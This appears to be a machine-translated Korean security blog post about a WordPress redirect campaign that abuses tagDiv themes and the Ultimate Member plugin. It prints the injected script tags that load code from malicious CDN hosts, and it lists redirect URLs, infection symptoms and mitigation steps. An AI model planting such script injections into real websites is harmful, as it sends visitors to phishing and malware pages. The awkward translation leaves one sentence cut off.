Computer >> 컴퓨터 >  >> 네트워킹 >> 네트워크 보안

WordPress 리디렉션 캠페인:취약한 tagDiv 테마 및 최종 회원 플러그인

날이 갈수록 방문자를 의심스러운 페이지로 리디렉션하는 WordPress 감염 사례가 일반화되고 있습니다. 최근 tagDiv 테마 및 Ultimate Member Plugins에서 취약점이 발견되었습니다. 이 WordPress 리디렉션 해킹에서 웹사이트 방문자는 피싱 또는 악성 페이지로 리디렉션됩니다.

이 해킹에서 사용자는 리디렉션될 때 임의의 URL이 있는 짜증나는 페이지로 이동합니다.

hxxp utroro.com/xyz  or 

hxxp://murieh.abc/xyz or

hxxps://unverf.com/xyz

및 피싱 reCAPTCHA 이미지. 표시된 텍스트는 동기를 밝히지 않고 브라우저 알림을 허용하도록 방문자를 속이려고 합니다.

WordPress 리디렉션 캠페인:취약한 tagDiv 테마 및 최종 회원 플러그인

또한 Google은 피싱 및 해킹된 웹사이트에 대해 웹사이트를 블랙리스트에 추가하여 처벌합니다. 웹 브라우저는 웹사이트를 방문하는 방문자에게 경고 메시지를 표시합니다.

악성 스크립트 삽입

주입된 감염에는 cdn.allyouwant.online의 두 웹 사이트 중 하나의 코드가 포함됩니다. 및 cdn.eeduelements.com.

전자는 이 악성 캠페인의 최근 단계에서 사용되었고 후자는 초기에 사용되었습니다.

...
<script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head>
...

현재 cdn.eeduelements.com 스크립트가 있는 1700개 이상의 사이트와 cdn.allyouwant.online 스크립트가 있는 500개 이상의 사이트

WordPress 리디렉션 해킹이 걱정되십니까? 채팅 위젯에 메시지를 남겨주시면 문제를 해결하는 데 도움을 드리겠습니다. 지금 내 WordPress 웹사이트를 보호하세요.

tagDiv 테마의 공격 벡터

이 WordPress 익스플로잇의 주요 인물은 tagDiv 테마입니다. 그리고 인기 있는 Ultimate Member에서 최근에 발견된(그리고 이미 패치된) 취약점 100,000개 이상이 있는 플러그인 활성 설치.

오래된 tagDiv 테마의 경우 , 맬웨어 주입은 다음과 같이 나타납니다.

WordPress 리디렉션 캠페인:취약한 tagDiv 테마 및 최종 회원 플러그인

Ultimate Member 플러그인의 취약점

Ultimate Member 플러그인의 취약점은 인증되지 않은 임의 파일 업로드입니다. 취약점은 2018년 8월 9일에 수정되었지만

WordPress 리디렉션 캠페인:취약한 tagDiv 테마 및 최종 회원 플러그인

WordPress 리디렉션 캠페인의 증상:Ultimate Member Plugins 악용

  1. Index.php가 손상되었습니다.
  2. /wp-content/plugins/ultimate-member/includes/images/smiles 디렉토리의 알 수 없는 PHP 파일
  3. 오류 로그 표시:5행 및 6행의 wp-content/plugins/ultimate-member/assets/dynamic_css/dynamic_profile.php
  4. 웹사이트가 원치 않는 사이트(애드웨어)로 리디렉션됨
  5. 홈페이지 방문 시 팝업이 표시됩니다.
  6. 신용카드 정보 도난
  7. 알 수 없는 파일이 서버에 생성되었습니다.
  8. WordPress 및 플러그인 폴더의 쿼리 파일 수정
  9. index.php의 횡설수설한 코드

WordPress 리디렉션 해킹:완화

이 WordPress 리디렉션 감염은 여러 다른 공격 벡터와 의심스러운 코드의 여러 변종을 사용합니다. 다음은 WordPress 리디렉션을 완화하는 몇 가지 단계입니다.

  1. 모든 테마와 플러그인을 최신 버전으로 업데이트합니다.
  2. 업로드 폴더에서 PHP 파일에 직접 액세스하지 못하도록 HTTP 인증을 설정합니다. 이는 무단 실행을 방지하기 위한 것입니다.
  3. tagDiv 감염 시 테마의 관리자 인터페이스에서 악성코드를 찾아 제거할 수 있습니다.
  4. Ultimate Member Plugin 익스플로잇의 경우 wp-content/uploads/ultimatemember/temp/ 하위 디렉토리의 모든 PHP 파일을 삭제합니다.

이러한 악성 리디렉션 캠페인은 감염 코드와 영향을 받는 파일을 자주 변경합니다. 보안 전문가에게 문의하는 것이 가장 좋습니다.

즉각적인 맬웨어 제거를 위해 지금 Astra 보안 전문가에게 문의하십시오. 당사의 강력한 방화벽은 XSS, LFI, RFI, SQL 주입, 불량 봇, 자동화된 취약점 스캐너 및 80개 이상의 보안 위협으로부터 웹사이트를 보호합니다. 지금 내 웹사이트를 보호하세요.